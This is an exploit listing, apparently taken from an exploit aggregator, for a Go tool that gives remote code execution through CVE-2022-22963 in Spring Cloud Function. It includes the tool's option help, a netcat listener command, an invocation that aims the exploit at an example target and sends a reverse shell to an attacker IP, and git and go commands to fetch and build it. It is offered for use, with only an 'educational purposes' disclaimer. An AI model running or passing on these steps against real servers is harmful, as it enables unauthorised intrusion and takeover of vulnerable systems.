Exploit for Expression Language Injection in Vmware Spring Cloud Function CVE-2022-22963

Name: Exploit for Expression Language Injection in Vmware Spring Cloud Function CVE-2022-22963
Rating: 5 (176 reviews)

2023-05-03 | CVSS 7.5

## https://sploitus.com/exploit?id=E00EE482-CF1E-5781-9A57-928FFA18D762
# CVE-2022-22963

Remote Code Execution exploiting CVE-2022-22963 attacking Spring Cloud service.

**Disclamier: This is for educational purposes only. The author is not responsible for the use of this program. Use under your own risk**


## Usage
```sh
./CVE-2022-22963 -h


Usage:
  CVE-2022-22963 [OPTIONS]

Application Options:
  -u, --target-url=     Target/Host url where 'Spring Cloud' is running. Example: -t http://somesite.htb
  -p, --target-port=    Port running the service. Example: -p 8080
  -i, --attacker-ip=    Attacker IPv4 Address. Example: -i 10.10.10.10
  -l, --listening-port= Listening port to connect. Example: -l 1337

Help Options:
  -h, --help            Show this help message
```

Assume a possible vulnerable target is running at `http://somerandomserver.com:8080`. Start `nc` listening on the port `1337`, so we run `nc -lvnp 1337`. Then, run the script/exploit:
```sh
./CVE-2022-22963 -u http://somerandomserver.com -p 8080 -i 10.10.10.10 -l 1337 
```

## Build from source
If you have `go` installed in your machine, just do:
```sh
git clone https://github.com/GunZF0x/CVE-2022-22963.git
cd CVE-2022-22963
go run main.go -h #run without compiling any file
go build -o exploit main.go #build the file
```